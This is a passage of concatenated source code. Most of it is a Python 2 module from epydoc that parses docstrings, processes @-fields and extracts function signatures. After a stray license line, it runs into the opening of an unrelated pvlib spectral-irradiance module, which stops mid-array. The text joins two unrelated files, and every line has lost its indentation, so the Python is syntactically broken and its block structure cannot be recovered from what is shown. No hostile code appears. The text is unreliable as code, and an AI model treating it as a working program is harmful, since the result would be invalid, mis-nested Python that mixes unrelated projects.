DocstringField(['since'], 'Since', multivalue=0),
# Changes made
DocstringField(['change', 'changed'], 'Change Log'),
# Crossreferences
DocstringField(['see', 'seealso'], 'See Also', short=1),
# Future Work
DocstringField(['todo'], 'To Do', takes_arg=True),
# Permissions (used by zope-based projects)
DocstringField(['permission', 'permissions'], 'Permission', 'Permissions')
]
######################################################################
#{ Docstring Parsing
######################################################################
DEFAULT_DOCFORMAT = 'epytext'
"""The name of the default markup languge used to process docstrings."""
# [xx] keep track of which ones we've already done, in case we're
# asked to process one twice? e.g., for @include we might have to
# parse the included docstring earlier than we might otherwise..??
def parse_docstring(api_doc, docindex, suppress_warnings=[]):
"""
Process the given C{APIDoc}'s docstring. In particular, populate
the C{APIDoc}'s C{descr} and C{summary} attributes, and add any
information provided by fields in the docstring.
@param docindex: A DocIndex, used to find the containing
module (to look up the docformat); and to find any
user docfields defined by containing objects.
@param suppress_warnings: A set of objects for which docstring
warnings should be suppressed.
"""
if api_doc.metadata is not UNKNOWN:
if not (isinstance(api_doc, RoutineDoc)
and api_doc.canonical_name[-1] == '__init__'):
log.debug("%s's docstring processed twice" %
api_doc.canonical_name)
return
initialize_api_doc(api_doc)
# If there's no docstring, then check for special variables (e.g.,
# __version__), and then return -- there's nothing else to do.
if (api_doc.docstring in (None, UNKNOWN)):
if isinstance(api_doc, NamespaceDoc):
for field in STANDARD_FIELDS + user_docfields(api_doc, docindex):
add_metadata_from_var(api_doc, field)
return
# Remove leading indentation from the docstring.
api_doc.docstring = unindent_docstring(api_doc.docstring)
# Decide which docformat is used by this module.
docformat = get_docformat(api_doc, docindex)
# A list of markup errors from parsing.
parse_errors = []
# Extract a signature from the docstring, if it has one. This
# overrides any signature we got via introspection/parsing.
if isinstance(api_doc, RoutineDoc):
parse_function_signature(api_doc, None, docformat, parse_errors)
# Parse the docstring. Any errors encountered are stored as
# `ParseError` objects in the errors list.
parsed_docstring = markup.parse(api_doc.docstring, docformat,
parse_errors)
# Divide the docstring into a description and a list of
# fields.
descr, fields = parsed_docstring.split_fields(parse_errors)
api_doc.descr = descr
field_warnings = []
# Handle the constructor fields that have been defined in the class
# docstring. This code assumes that a class docstring is parsed before
# the same class __init__ docstring.
if isinstance(api_doc, ClassDoc):
# Parse ahead the __init__ docstring for this class
initvar = api_doc.variables.get('__init__')
if initvar and isinstance(initvar.value, RoutineDoc):
init_api_doc = initvar.value
parse_docstring(init_api_doc, docindex, suppress_warnings)
parse_function_signature(init_api_doc, api_doc,
docformat, parse_errors)
init_fields = split_init_fields(fields, field_warnings)
# Process fields
for field in init_fields:
try:
process_field(init_api_doc, docindex, field.tag(),
field.arg(), field.body())
except ValueError, e: field_warnings.append(str(e))
# Process fields
for field in fields:
try:
process_field(api_doc, docindex, field.tag(),
field.arg(), field.body())
except ValueError, e: field_warnings.append(str(e))
# Check to make sure that all type parameters correspond to
# some documented parameter.
check_type_fields(api_doc, field_warnings)
# Check for special variables (e.g., __version__)
if isinstance(api_doc, NamespaceDoc):
for field in STANDARD_FIELDS + user_docfields(api_doc, docindex):
add_metadata_from_var(api_doc, field)
# Extract a summary
if api_doc.summary is None and api_doc.descr is not None:
api_doc.summary, api_doc.other_docs = api_doc.descr.summary()
# If the summary is empty, but the return field is not, then use
# the return field to generate a summary description.
if (isinstance(api_doc, RoutineDoc) and api_doc.summary is None and
api_doc.return_descr is not None):
s, o = api_doc.return_descr.summary()
api_doc.summary = RETURN_PDS + s
api_doc.other_docs = o
# [XX] Make sure we don't have types/param descrs for unknown
# vars/params?
# Report any errors that occured
if api_doc in suppress_warnings:
if parse_errors or field_warnings:
log.info("Suppressing docstring warnings for %s, since it "
"is not included in the documented set." %
api_doc.canonical_name)
else:
report_errors(api_doc, docindex, parse_errors, field_warnings)
def add_metadata_from_var(api_doc, field):
for varname in field.varnames:
# Check if api_doc has a variable w/ the given name.
if varname not in api_doc.variables: continue
# Check moved here from before the for loop because we expect to
# reach rarely this point. The loop below is to be performed more than
# once only for fields with more than one varname, which currently is
# only 'author'.
for md in api_doc.metadata:
if field == md[0]:
return # We already have a value for this metadata.
var_doc = api_doc.variables[varname]
if var_doc.value is UNKNOWN: continue
val_doc = var_doc.value
value = []
# Try extracting the value from the pyval.
ok_types = (basestring, int, float, bool, type(None))
if val_doc.pyval is not UNKNOWN:
if isinstance(val_doc.pyval, ok_types):
value = [val_doc.pyval]
elif field.multivalue:
if isinstance(val_doc.pyval, (tuple, list)):
for elt in val_doc.pyval:
if not isinstance(elt, ok_types): break
else:
value = list(val_doc.pyval)
# Try extracting the value from the parse tree.
elif val_doc.toktree is not UNKNOWN:
try: value = [epydoc.docparser.parse_string(val_doc.toktree)]
except KeyboardInterrupt: raise
except: pass
if field.multivalue and not value:
try: value = epydoc.docparser.parse_string_list(val_doc.toktree)
except KeyboardInterrupt: raise
except: raise
# Add any values that we found.
for elt in value:
if isinstance(elt, str):
elt = decode_with_backslashreplace(elt)
else:
elt = unicode(elt)
elt = epytext.ParsedEpytextDocstring(
epytext.parse_as_para(elt), inline=True)
# Add in the metadata and remove from the variables
api_doc.metadata.append( (field, varname, elt) )
# Remove the variable itself (unless it's documented)
if var_doc.docstring in (None, UNKNOWN):
del api_doc.variables[varname]
if api_doc.sort_spec is not UNKNOWN:
try: api_doc.sort_spec.remove(varname)
except ValueError: pass
def initialize_api_doc(api_doc):
"""A helper function for L{parse_docstring()} that initializes
the attributes that C{parse_docstring()} will write to."""
if api_doc.descr is UNKNOWN:
api_doc.descr = None
if api_doc.summary is UNKNOWN:
api_doc.summary = None
if api_doc.metadata is UNKNOWN:
api_doc.metadata = []
if isinstance(api_doc, RoutineDoc):
if api_doc.arg_descrs is UNKNOWN:
api_doc.arg_descrs = []
if api_doc.arg_types is UNKNOWN:
api_doc.arg_types = {}
if api_doc.return_descr is UNKNOWN:
api_doc.return_descr = None
if api_doc.return_type is UNKNOWN:
api_doc.return_type = None
if api_doc.exception_descrs is UNKNOWN:
api_doc.exception_descrs = []
if isinstance(api_doc, (VariableDoc, PropertyDoc)):
if api_doc.type_descr is UNKNOWN:
api_doc.type_descr = None
if isinstance(api_doc, NamespaceDoc):
if api_doc.group_specs is UNKNOWN:
api_doc.group_specs = []
if api_doc.sort_spec is UNKNOWN:
api_doc.sort_spec = []
def split_init_fields(fields, warnings):
"""
Remove the fields related to the constructor from a class docstring
fields list.
@param fields: The fields to process. The list will be modified in place
@type fields: C{list} of L{markup.Field}
@param warnings: A list to emit processing warnings
@type warnings: C{list}
@return: The C{fields} items to be applied to the C{__init__} method
@rtype: C{list} of L{markup.Field}
"""
init_fields = []
# Split fields in lists according to their argument, keeping order.
arg_fields = {}
args_order = []
i = 0
while i < len(fields):
field = fields[i]
# gather together all the fields with the same arg
if field.arg() is not None:
arg_fields.setdefault(field.arg(), []).append(fields.pop(i))
args_order.append(field.arg())
else:
i += 1
# Now check that for each argument there is at most a single variable
# and a single parameter, and at most a single type for each of them.
for arg in args_order:
ff = arg_fields.pop(arg, None)
if ff is None:
continue
var = tvar = par = tpar = None
for field in ff:
if field.tag() in VARIABLE_TAGS:
if var is None:
var = field
fields.append(field)
else:
warnings.append(
"There is more than one variable named '%s'"
% arg)
elif field.tag() in PARAMETER_TAGS:
if par is None:
par = field
init_fields.append(field)
else:
warnings.append(
"There is more than one parameter named '%s'"
% arg)
elif field.tag() == 'type':
if var is None and par is None:
# type before obj
tvar = tpar = field
else:
if var is not None and tvar is None:
tvar = field
if par is not None and tpar is None:
tpar = field
elif field.tag() in EXCEPTION_TAGS:
init_fields.append(field)
else: # Unespected field
fields.append(field)
# Put selected types into the proper output lists
if tvar is not None:
if var is not None:
fields.append(tvar)
else:
pass # [xx] warn about type w/o object?
if tpar is not None:
if par is not None:
init_fields.append(tpar)
else:
pass # [xx] warn about type w/o object?
return init_fields
def report_errors(api_doc, docindex, parse_errors, field_warnings):
"""A helper function for L{parse_docstring()} that reports any
markup warnings and field warnings that we encountered while
processing C{api_doc}'s docstring."""
if not parse_errors and not field_warnings: return
# Get the name of the item containing the error, and the
# filename of its containing module.
name = api_doc.canonical_name
module = api_doc.defining_module
if module is not UNKNOWN and module.filename not in (None, UNKNOWN):
try: filename = py_src_filename(module.filename)
except: filename = module.filename
else:
filename = '??'
# [xx] Don't report markup errors for standard builtins.
# n.b. that we must use 'is' to compare pyvals here -- if we use
# 'in' or '==', then a user __cmp__ method might raise an
# exception, or lie.
if isinstance(api_doc, ValueDoc) and api_doc != module:
if module not in (None, UNKNOWN) and module.pyval is exceptions:
return
for builtin_val in __builtin__.__dict__.values():
if builtin_val is api_doc.pyval:
return
# Get the start line of the docstring containing the error.
startline = api_doc.docstring_lineno
if startline in (None, UNKNOWN):
startline = introspect_docstring_lineno(api_doc)
if startline in (None, UNKNOWN):
startline = None
# Display a block header.
header = 'File %s, ' % filename
if startline is not None:
header += 'line %d, ' % startline
header += 'in %s' % name
log.start_block(header)
# Display all parse errors. But first, combine any errors
# with duplicate description messages.
if startline is None:
# remove dups, but keep original order:
dups = {}
for error in parse_errors:
message = error.descr()
if message not in dups:
log.docstring_warning(message)
dups[message] = 1
else:
# Combine line number fields for dup messages:
messages = {} # maps message -> list of linenum
for error in parse_errors:
error.set_linenum_offset(startline)
message = error.descr()
messages.setdefault(message, []).append(error.linenum())
message_items = messages.items()
message_items.sort(lambda a,b:cmp(min(a[1]), min(b[1])))
for message, linenums in message_items:
linenums = [n for n in linenums if n is not None]
if len(linenums) == 0:
log.docstring_warning(message)
elif len(linenums) == 1:
log.docstring_warning("Line %s: %s" % (linenums[0], message))
else:
linenums = ', '.join(['%s' % l for l in linenums])
log.docstring_warning("Lines %s: %s" % (linenums, message))
# Display all field warnings.
for warning in field_warnings:
log.docstring_warning(warning)
# End the message block.
log.end_block()
RETURN_PDS = markup.parse('Returns:', markup='epytext')
"""A ParsedDocstring containing the text 'Returns'. This is used to
construct summary descriptions for routines that have empty C{descr},
but non-empty C{return_descr}."""
RETURN_PDS._tree.children[0].attribs['inline'] = True
######################################################################
#{ Field Processing Error Messages
######################################################################
UNEXPECTED_ARG = '%r did not expect an argument'
EXPECTED_ARG = '%r expected an argument'
EXPECTED_SINGLE_ARG = '%r expected a single argument'
BAD_CONTEXT = 'Invalid context for %r'
REDEFINED = 'Redefinition of %s'
UNKNOWN_TAG = 'Unknown field tag %r'
BAD_PARAM = '@%s for unknown parameter %s'
######################################################################
#{ Field Processing
######################################################################
def process_field(api_doc, docindex, tag, arg, descr):
"""
Process a single field, and use it to update C{api_doc}. If
C{tag} is the name of a special field, then call its handler
function. If C{tag} is the name of a simple field, then use
C{process_simple_field} to process it. Otherwise, check if it's a
user-defined field, defined in this docstring or the docstring of
a containing object; and if so, process it with
C{process_simple_field}.
@param tag: The field's tag, such as C{'author'}
@param arg: The field's optional argument
@param descr: The description following the field tag and
argument.
@raise ValueError: If a problem was encountered while processing
the field. The C{ValueError}'s string argument is an
explanation of the problem, which should be displayed as a
warning message.
"""
# standard special fields
if tag in _field_dispatch_table:
handler = _field_dispatch_table[tag]
handler(api_doc, docindex, tag, arg, descr)
return
# standard simple fields & user-defined fields
for field in STANDARD_FIELDS + user_docfields(api_doc, docindex):
if tag in field.tags:
# [xx] check if it's redefined if it's not multivalue??
if not field.takes_arg:
_check(api_doc, tag, arg, expect_arg=False)
api_doc.metadata.append((field, arg, descr))
return
# If we didn't handle the field, then report a warning.
raise ValueError(UNKNOWN_TAG % tag)
def user_docfields(api_doc, docindex):
"""
Return a list of user defined fields that can be used for the
given object. This list is taken from the given C{api_doc}, and
any of its containing C{NamepaceDoc}s.
@note: We assume here that a parent's docstring will always be
parsed before its childrens'. This is indeed the case when we
are called via L{docbuilder.build_doc_index()}. If a child's
docstring is parsed before its parents, then its parent won't
yet have had its C{extra_docstring_fields} attribute
initialized.
"""
docfields = []
# Get any docfields from `api_doc` itself
if api_doc.extra_docstring_fields not in (None, UNKNOWN):
docfields += api_doc.extra_docstring_fields
# Get any docfields from `api_doc`'s ancestors
for i in range(len(api_doc.canonical_name)-1, 0, -1):
ancestor = docindex.get_valdoc(api_doc.canonical_name[:i])
if ancestor is not None \
and ancestor.extra_docstring_fields not in (None, UNKNOWN):
docfields += ancestor.extra_docstring_fields
return docfields
_field_dispatch_table = {}
def register_field_handler(handler, *field_tags):
"""
Register the given field handler function for processing any
of the given field tags. Field handler functions should
have the following signature:
>>> def field_handler(api_doc, docindex, tag, arg, descr):
... '''update api_doc in response to the field.'''
Where C{api_doc} is the documentation object to update;
C{docindex} is a L{DocIndex} that can be used to look up the
documentation for related objects; C{tag} is the field tag that
was used; C{arg} is the optional argument; and C{descr} is the
description following the field tag and argument.
"""
for field_tag in field_tags:
_field_dispatch_table[field_tag] = handler
######################################################################
#{ Field Handler Functions
######################################################################
def process_summary_field(api_doc, docindex, tag, arg, descr):
"""Store C{descr} in C{api_doc.summary}"""
_check(api_doc, tag, arg, expect_arg=False)
if api_doc.summary is not None:
raise ValueError(REDEFINED % tag)
api_doc.summary = descr
def process_include_field(api_doc, docindex, tag, arg, descr):
"""Copy the docstring contents from the object named in C{descr}"""
_check(api_doc, tag, arg, expect_arg=False)
# options:
# a. just append the descr to our own
# b. append descr and update metadata
# c. append descr and process all fields.
# in any case, mark any errors we may find as coming from an
# imported docstring.
# how does this interact with documentation inheritance??
raise ValueError('%s not implemented yet' % tag)
def process_undocumented_field(api_doc, docindex, tag, arg, descr):
"""Remove any documentation for the variables named in C{descr}"""
_check(api_doc, tag, arg, context=NamespaceDoc, expect_arg=False)
for ident in _descr_to_identifiers(descr):
var_name_re = re.compile('^%s$' % ident.replace('*', '(.*)'))
for var_name, var_doc in api_doc.variables.items():
if var_name_re.match(var_name):
# Remove the variable from `variables`.
api_doc.variables.pop(var_name, None)
if api_doc.sort_spec is not UNKNOWN:
try: api_doc.sort_spec.remove(var_name)
except ValueError: pass
# For modules, remove any submodules that match var_name_re.
if isinstance(api_doc, ModuleDoc):
removed = set([m for m in api_doc.submodules
if var_name_re.match(m.canonical_name[-1])])
if removed:
# Remove the indicated submodules from this module.
api_doc.submodules = [m for m in api_doc.submodules
if m not in removed]
# Remove all ancestors of the indicated submodules
# from the docindex root. E.g., if module x
# declares y to be undocumented, then x.y.z should
# also be undocumented.
for elt in docindex.root[:]:
for m in removed:
if m.canonical_name.dominates(elt.canonical_name):
docindex.root.remove(elt)
def process_group_field(api_doc, docindex, tag, arg, descr):
"""Define a group named C{arg} containing the variables whose
names are listed in C{descr}."""
_check(api_doc, tag, arg, context=NamespaceDoc, expect_arg=True)
api_doc.group_specs.append( (arg, _descr_to_identifiers(descr)) )
# [xx] should this also set sort order?
def process_deffield_field(api_doc, docindex, tag, arg, descr):
"""Define a new custom field."""
_check(api_doc, tag, arg, expect_arg=True)
if api_doc.extra_docstring_fields is UNKNOWN:
api_doc.extra_docstring_fields = []
try:
docstring_field = _descr_to_docstring_field(arg, descr)
docstring_field.varnames.append("__%s__" % arg)
api_doc.extra_docstring_fields.append(docstring_field)
except ValueError, e:
raise ValueError('Bad %s: %s' % (tag, e))
def process_raise_field(api_doc, docindex, tag, arg, descr):
"""Record the fact that C{api_doc} can raise the exception named
C{tag} in C{api_doc.exception_descrs}."""
_check(api_doc, tag, arg, context=RoutineDoc, expect_arg='single')
try: name = DottedName(arg, strict=True)
except DottedName.InvalidDottedName: name = arg
api_doc.exception_descrs.append( (name, descr) )
def process_sort_field(api_doc, docindex, tag, arg, descr):
_check(api_doc, tag, arg, context=NamespaceDoc, expect_arg=False)
api_doc.sort_spec = _descr_to_identifiers(descr) + api_doc.sort_spec
# [xx] should I notice when they give a type for an unknown var?
def process_type_field(api_doc, docindex, tag, arg, descr):
# In namespace, "@type var: ..." describes the type of a var.
if isinstance(api_doc, NamespaceDoc):
_check(api_doc, tag, arg, expect_arg='single')
set_var_type(api_doc, arg, descr)
# For variables & properties, "@type: ..." describes the variable.
elif isinstance(api_doc, (VariableDoc, PropertyDoc)):
_check(api_doc, tag, arg, expect_arg=False)
if api_doc.type_descr is not None:
raise ValueError(REDEFINED % tag)
api_doc.type_descr = descr
# For routines, "@type param: ..." describes a parameter.
elif isinstance(api_doc, RoutineDoc):
_check(api_doc, tag, arg, expect_arg='single')
if arg in api_doc.arg_types:
raise ValueError(REDEFINED % ('type for '+arg))
api_doc.arg_types[arg] = descr
else:
raise ValueError(BAD_CONTEXT % tag)
def process_var_field(api_doc, docindex, tag, arg, descr):
_check(api_doc, tag, arg, context=ModuleDoc, expect_arg=True)
for ident in re.split('[:;, ] *', arg):
set_var_descr(api_doc, ident, descr)
def process_cvar_field(api_doc, docindex, tag, arg, descr):
# If @cvar is used *within* a variable, then use it as the
# variable's description, and treat the variable as a class var.
if (isinstance(api_doc, VariableDoc) and
isinstance(api_doc.container, ClassDoc)):
_check(api_doc, tag, arg, expect_arg=False)
api_doc.is_instvar = False
api_doc.descr = markup.ConcatenatedDocstring(api_doc.descr, descr)
api_doc.summary, api_doc.other_docs = descr.summary()
# Otherwise, @cvar should be used in a class.
else:
_check(api_doc, tag, arg, context=ClassDoc, expect_arg=True)
for ident in re.split('[:;, ] *', arg):
set_var_descr(api_doc, ident, descr)
api_doc.variables[ident].is_instvar = False
def process_ivar_field(api_doc, docindex, tag, arg, descr):
# If @ivar is used *within* a variable, then use it as the
# variable's description, and treat the variable as an instvar.
if (isinstance(api_doc, VariableDoc) and
isinstance(api_doc.container, ClassDoc)):
_check(api_doc, tag, arg, expect_arg=False)
# require that there be no other descr?
api_doc.is_instvar = True
api_doc.descr = markup.ConcatenatedDocstring(api_doc.descr, descr)
api_doc.summary, api_doc.other_docs = descr.summary()
# Otherwise, @ivar should be used in a class.
else:
_check(api_doc, tag, arg, context=ClassDoc, expect_arg=True)
for ident in re.split('[:;, ] *', arg):
set_var_descr(api_doc, ident, descr)
api_doc.variables[ident].is_instvar = True
# [xx] '@return: foo' used to get used as a descr if no other
# descr was present. is that still true?
def process_return_field(api_doc, docindex, tag, arg, descr):
_check(api_doc, tag, arg, context=RoutineDoc, expect_arg=False)
if api_doc.return_descr is not None:
raise ValueError(REDEFINED % 'return value description')
api_doc.return_descr = descr
def process_rtype_field(api_doc, docindex, tag, arg, descr):
_check(api_doc, tag, arg,
context=(RoutineDoc, PropertyDoc), expect_arg=False)
if isinstance(api_doc, RoutineDoc):
if api_doc.return_type is not None:
raise ValueError(REDEFINED % 'return value type')
api_doc.return_type = descr
elif isinstance(api_doc, PropertyDoc):
_check(api_doc, tag, arg, expect_arg=False)
if api_doc.type_descr is not None:
raise ValueError(REDEFINED % tag)
api_doc.type_descr = descr
def process_arg_field(api_doc, docindex, tag, arg, descr):
_check(api_doc, tag, arg, context=RoutineDoc, expect_arg=True)
idents = re.split('[:;, ] *', arg)
api_doc.arg_descrs.append( (idents, descr) )
# Check to make sure that the documented parameter(s) are
# actually part of the function signature.
all_args = api_doc.all_args()
if all_args not in (['...'], UNKNOWN):
bad_params = ['"%s"' % i for i in idents if i not in all_args]
if bad_params:
raise ValueError(BAD_PARAM % (tag, ', '.join(bad_params)))
def process_kwarg_field(api_doc, docindex, tag, arg, descr):
# [xx] these should -not- be checked if they exist..
# and listed separately or not??
_check(api_doc, tag, arg, context=RoutineDoc, expect_arg=True)
idents = re.split('[:;, ] *', arg)
api_doc.arg_descrs.append( (idents, descr) )
register_field_handler(process_group_field, 'group')
register_field_handler(process_deffield_field, 'deffield', 'newfield')
register_field_handler(process_sort_field, 'sort')
register_field_handler(process_summary_field, 'summary')
register_field_handler(process_undocumented_field, 'undocumented')
register_field_handler(process_include_field, 'include')
register_field_handler(process_var_field, 'var', 'variable')
register_field_handler(process_type_field, 'type')
register_field_handler(process_cvar_field, 'cvar', 'cvariable')
register_field_handler(process_ivar_field, 'ivar', 'ivariable')
register_field_handler(process_return_field, 'return', 'returns')
register_field_handler(process_rtype_field, 'rtype', 'returntype')
register_field_handler(process_arg_field, 'arg', 'argument',
'parameter', 'param')
register_field_handler(process_kwarg_field, 'kwarg', 'keyword', 'kwparam')
register_field_handler(process_raise_field, 'raise', 'raises',
'except', 'exception')
# Tags related to function parameters
PARAMETER_TAGS = ('arg', 'argument', 'parameter', 'param',
'kwarg', 'keyword', 'kwparam')
# Tags related to variables in a class
VARIABLE_TAGS = ('cvar', 'cvariable', 'ivar', 'ivariable')
# Tags related to exceptions
EXCEPTION_TAGS = ('raise', 'raises', 'except', 'exception')
######################################################################
#{ Helper Functions
######################################################################
def check_type_fields(api_doc, field_warnings):
"""Check to make sure that all type fields correspond to some
documented parameter; if not, append a warning to field_warnings."""
if isinstance(api_doc, RoutineDoc):
for arg in api_doc.arg_types:
if arg not in api_doc.all_args():
for args, descr in api_doc.arg_descrs:
if arg in args:
break
else:
field_warnings.append(BAD_PARAM % ('type', '"%s"' % arg))
def set_var_descr(api_doc, ident, descr):
if ident not in api_doc.variables:
api_doc.variables[ident] = VariableDoc(
container=api_doc, name=ident,
canonical_name=api_doc.canonical_name+ident)
var_doc = api_doc.variables[ident]
if var_doc.descr not in (None, UNKNOWN):
raise ValueError(REDEFINED % ('description for '+ident))
var_doc.descr = descr
if var_doc.summary in (None, UNKNOWN):
var_doc.summary, var_doc.other_docs = var_doc.descr.summary()
def set_var_type(api_doc, ident, descr):
if ident not in api_doc.variables:
api_doc.variables[ident] = VariableDoc(
container=api_doc, name=ident,
canonical_name=api_doc.canonical_name+ident)
var_doc = api_doc.variables[ident]
if var_doc.type_descr not in (None, UNKNOWN):
raise ValueError(REDEFINED % ('type for '+ident))
var_doc.type_descr = descr
def _check(api_doc, tag, arg, context=None, expect_arg=None):
if context is not None:
if not isinstance(api_doc, context):
raise ValueError(BAD_CONTEXT % tag)
if expect_arg is not None:
if expect_arg == True:
if arg is None:
raise ValueError(EXPECTED_ARG % tag)
elif expect_arg == False:
if arg is not None:
raise ValueError(UNEXPECTED_ARG % tag)
elif expect_arg == 'single':
if (arg is None or ' ' in arg):
raise ValueError(EXPECTED_SINGLE_ARG % tag)
else:
assert 0, 'bad value for expect_arg'
def get_docformat(api_doc, docindex):
"""
Return the name of the markup language that should be used to
parse the API documentation for the given object.
"""
# Find the module that defines api_doc.
module = api_doc.defining_module
# Look up its docformat.
if module is not UNKNOWN and module.docformat not in (None, UNKNOWN):
docformat = module.docformat
else:
docformat = DEFAULT_DOCFORMAT
# Convert to lower case & strip region codes.
try: return docformat.lower().split()[0]
except: return DEFAULT_DOCFORMAT
def unindent_docstring(docstring):
# [xx] copied from inspect.getdoc(); we can't use inspect.getdoc()
# itself, since it expects an object, not a string.
if not docstring: return ''
lines = docstring.expandtabs().split('\n')
# Find minimum indentation of any non-blank lines after first line.
margin = sys.maxint
for line in lines[1:]:
content = len(line.lstrip())
if content:
indent = len(line) - content
margin = min(margin, indent)
# Remove indentation.
if lines:
lines[0] = lines[0].lstrip()
if margin < sys.maxint:
for i in range(1, len(lines)): lines[i] = lines[i][margin:]
# Remove any trailing (but not leading!) blank lines.
while lines and not lines[-1]:
lines.pop()
#while lines and not lines[0]:
# lines.pop(0)
return '\n'.join(lines)
_IDENTIFIER_LIST_REGEXP = re.compile(r'^[\w.\*]+([\s,:;]\s*[\w.\*]+)*$')
def _descr_to_identifiers(descr):
"""
Given a C{ParsedDocstring} that contains a list of identifiers,
return a list of those identifiers. This is used by fields such
as C{@group} and C{@sort}, which expect lists of identifiers as
their values. To extract the identifiers, the docstring is first
converted to plaintext, and then split. The plaintext content of
the docstring must be a a list of identifiers, separated by
spaces, commas, colons, or semicolons.
@rtype: C{list} of C{string}
@return: A list of the identifier names contained in C{descr}.
@type descr: L{markup.ParsedDocstring}
@param descr: A C{ParsedDocstring} containing a list of
identifiers.
@raise ValueError: If C{descr} does not contain a valid list of
identifiers.
"""
idents = descr.to_plaintext(None).strip()
idents = re.sub(r'\s+', ' ', idents)
if not _IDENTIFIER_LIST_REGEXP.match(idents):
raise ValueError, 'Bad Identifier list: %r' % idents
rval = re.split('[:;, ] *', idents)
return rval
def _descr_to_docstring_field(arg, descr):
tags = [s.lower() for s in re.split('[:;, ] *', arg)]
descr = descr.to_plaintext(None).strip()
args = re.split('[:;,] *', descr)
if len(args) == 0 or len(args) > 3:
raise ValueError, 'Wrong number of arguments'
singular = args[0]
if len(args) >= 2: plural = args[1]
else: plural = None
short = 0
if len(args) >= 3:
if args[2] == 'short': short = 1
else: raise ValueError('Bad arg 2 (expected "short")')
return DocstringField(tags, singular, plural, short)
######################################################################
#{ Function Signature Extraction
######################################################################
# [XX] todo: add optional type modifiers?
_SIGNATURE_RE = re.compile(
# Class name (for builtin methods)
r'^\s*((?P<self>\w+)\.)?' +
# The function name (must match exactly) [XX] not anymore!
r'(?P<func>\w+)' +
# The parameters
r'\((?P<params>(\s*\[?\s*\*{0,2}[\w\-\.]+(\s*=.+?)?'+
r'(\s*\[?\s*,\s*\]?\s*\*{0,2}[\w\-\.]+(\s*=.+?)?)*\]*)?)\s*\)' +
# The return value (optional)
r'(\s*(->)\s*(?P<return>\S.*?))?'+
# The end marker
r'\s*(\n|\s+(--|<=+>)\s+|$|\.\s+|\.\n)')
"""A regular expression that is used to extract signatures from
docstrings."""
def parse_function_signature(func_doc, doc_source, docformat, parse_errors):
"""
Construct the signature for a builtin function or method from
its docstring. If the docstring uses the standard convention
of including a signature in the first line of the docstring
(and formats that signature according to standard
conventions), then it will be used to extract a signature.
Otherwise, the signature will be set to a single varargs
variable named C{"..."}.
@param func_doc: The target object where to store parsed signature. Also
container of the docstring to parse if doc_source is C{None}
@type func_doc: L{RoutineDoc}
@param doc_source: Contains the docstring to parse. If C{None}, parse
L{func_doc} docstring instead
@type doc_source: L{APIDoc}
@rtype: C{None}
"""
if doc_source is None:
doc_source = func_doc
# If there's no docstring, then don't do anything.
if not doc_source.docstring: return False
m = _SIGNATURE_RE.match(doc_source.docstring)
if m is None: return False
# Do I want to be this strict?
# Notice that __init__ must match the class name instead, if the signature
# comes from the class docstring
# if not (m.group('func') == func_doc.canonical_name[-1] or
# '_'+m.group('func') == func_doc.canonical_name[-1]):
# log.warning("Not extracting function signature from %s's "
# "docstring, since the name doesn't match." %
# func_doc.canonical_name)
# return False
params = m.group('params')
rtype = m.group('return')
selfparam = m.group('self')
# Extract the parameters from the signature.
func_doc.posargs = []
func_doc.vararg = None
func_doc.kwarg = None
if func_doc.posarg_defaults is UNKNOWN:
func_doc.posarg_defaults = []
if params:
# Figure out which parameters are optional.
while '[' in params or ']' in params:
m2 = re.match(r'(.*)\[([^\[\]]+)\](.*)', params)
if not m2: return False
(start, mid, end) = m2.groups()
mid = re.sub(r'((,|^)\s*[\w\-\.]+)', r'\1=...', mid)
params = start+mid+end
params = re.sub(r'=...=' , r'=', params)
for name in params.split(','):
if '=' in name:
(name, default_repr) = name.split('=',1)
default = GenericValueDoc(parse_repr=default_repr)
else:
default = None
name = name.strip()
if name == '...':
func_doc.vararg = '...'
elif name.startswith('**'):
func_doc.kwarg = name[2:]
elif name.startswith('*'):
func_doc.vararg = name[1:]
else:
func_doc.posargs.append(name)
if len(func_doc.posarg_defaults) < len(func_doc.posargs):
func_doc.posarg_defaults.append(default)
elif default is not None:
argnum = len(func_doc.posargs)-1
func_doc.posarg_defaults[argnum] = default
# Extract the return type/value from the signature
if rtype:
func_doc.return_type = markup.parse(rtype, docformat, parse_errors,
inline=True)
# Add the self parameter, if it was specified.
if selfparam:
func_doc.posargs.insert(0, selfparam)
func_doc.posarg_defaults.insert(0, None)
# Remove the signature from the docstring.
doc_source.docstring = doc_source.docstring[m.end():]
# We found a signature.
return True
| apache-2.0 |
cwhanse/pvlib-python | pvlib/spectrum/spectrl2.py | 3 | 18269 | r"""
The ``spectrl2`` module implements the Bird Simple Spectral Model.
"""
import pvlib
from pvlib.tools import cosd
import numpy as np
import pandas as pd
# SPECTRL2 extraterrestrial spectrum and atmospheric absorption coefficients
_SPECTRL2_COEFFS = np.zeros(122, dtype=np.dtype([
('wavelength', 'float64'),
('spectral_irradiance_et', 'float64'),
('water_vapor_absorption', 'float64'),
('ozone_absorption', 'float64'),
('mixed_absorption', 'float64'),
]))
_SPECTRL2_COEFFS['wavelength'] = [ # nm
300.0, 305.0, 310.0, 315.0, 320.0, 325.0, 330.0, 335.0, 340.0, 345.0,
350.0, 360.0, 370.0, 380.0, 390.0, 400.0, 410.0, 420.0, 430.0, 440.0,
450.0, 460.0, 470.0, 480.0, 490.0, 500.0, 510.0, 520.0, 530.0, 540.0,
550.0, 570.0, 593.0, 610.0, 630.0, 656.0, 667.6, 690.0, 710.0, 718.0,
724.4, 740.0, 752.5, 757.5, 762.5, 767.5, 780.0, 800.0, 816.0, 823.7,
831.5, 840.0, 860.0, 880.0, 905.0, 915.0, 925.0, 930.0, 937.0, 948.0,
965.0, 980.0, 993.5, 1040.0, 1070.0, 1100.0, 1120.0, 1130.0, 1145.0,
1161.0, 1170.0, 1200.0, 1240.0, 1270.0, 1290.0, 1320.0, 1350.0, 1395.0,
1442.5, 1462.5, 1477.0, 1497.0, 1520.0, 1539.0, 1558.0, 1578.0, 1592.0,
1610.0, 1630.0, 1646.0, 1678.0, 1740.0, 1800.0, 1860.0, 1920.0, 1960.0,
1985.0, 2005.0, 2035.0, 2065.0, 2100.0, 2148.0, 2198.0, 2270.0, 2360.0,
2450.0, 2500.0, 2600.0, 2700.0, 2800.0, 2900.0, 3000.0, 3100.0, 3200.0,
3300.0, 3400.0, 3500.0, 3600.0, 3700.0, 3800.0, 3900.0, 4000.0
]
_SPECTRL2_COEFFS['spectral_irradiance_et'] = [ # W/m^2/nm
0.5359, 0.5583, 0.622, 0.6927, 0.7151, 0.8329, 0.9619, 0.9319, 0.9006,
0.9113, 0.9755, 0.9759, 1.1199, 1.1038, 1.0338, 1.4791, 1.7013, 1.7404,
